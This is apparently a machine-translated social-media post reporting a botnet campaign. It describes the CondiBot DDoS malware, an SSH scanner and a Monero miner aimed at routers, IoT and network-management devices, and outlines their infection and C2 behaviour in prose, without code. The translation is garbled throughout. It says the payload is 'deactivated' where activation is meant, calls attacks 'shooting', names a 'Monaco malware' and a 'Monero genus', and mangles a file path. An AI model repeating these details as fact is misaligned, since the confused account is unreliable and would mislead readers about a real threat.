A new malware to turn a Network device into a DDoS.

A new malware has been found that turns the Network device into a DDoS tool.

Distributed Denial-of-Service System Shooting Usually requires some tools to collect the machine that will be used to shoot the system. Most often, botnet malware is used to convert victims' devices that are not involved around the world into zombies in system shooting, and this news is once again one of the spread of this type of malware.

According to a report by the website, Cyber Security News has mentioned the detection of a Botnet malware outbreak campaign to be used to shoot DDoS. The malware focuses on various network related devices - routers, IoT devices (Internet of Things), and enterprise network management devices (Enterprise). There are three malware spread in this campaign: Botnet malware CondiBot for DDoS embedded on network management devices running on Linux and Monaco malware type scans. Secure Shell to attack the system or SSH Scanner, and finally Monero, a malware for mining the Monero genus of Crypto Miner that will be released by the Monaco malware after it has been successfully embedded on the system. All of these malware was detected in the beginning of March. The first two are new malware that have never been recorded on famous malware detection tools like VirusTotal, ThreatFox, and Hybrid Analysis before.

According to a research team from Eclypsium, a supply chain attack specialist, it can be noted that the malware spread behavior is unlikely to come from state-sponsored hackers, but it is likely from hackers who hope to use the victim's machine resources to dig and profit more from mined coins. These hackers tend to use security vulnerabilities on the victim's machine, especially those that occur during the development of the system or Zero-Day, often in particular. And even more dangerous, the devices that hackers focus on in this campaign are usually those that cannot run normal security monitoring tools, so that both hackers and malware can be embedded in the system for a long time without being detected.

For malware attacks, CondiBot starts with hackers using File Transfer Utility tools such as wget, curl, tftp, and ftpget. Send payload files on a Linux device with a security vulnerability (the source does not specify which vulnerability). After the payload is deactivated on the target system, the malware closes the Reboot Utility tool by changing the permissions of the corresponding files to 000. Then contact the C2 or Command and Control server and register the specified number. Unique Bot Identifier

After registering, the malware will immediately enter the Waiting Loop and receive commands from the C2 server. Once ordered, the malware will send one of the 32 Attack Handlers to act immediately. The malware also has the ability to remove any other Botnet malware that may be on board, as well as to handle a process called / bin / sora so that the malware can take over the machine completely. With such perfect operation, it is very difficult to deal with the malware, in addition to Will have direct access to the machine itself to handle it.

# Trending # Lemon 8 Howtoo # lemon 8 diary # freedomhack # ddos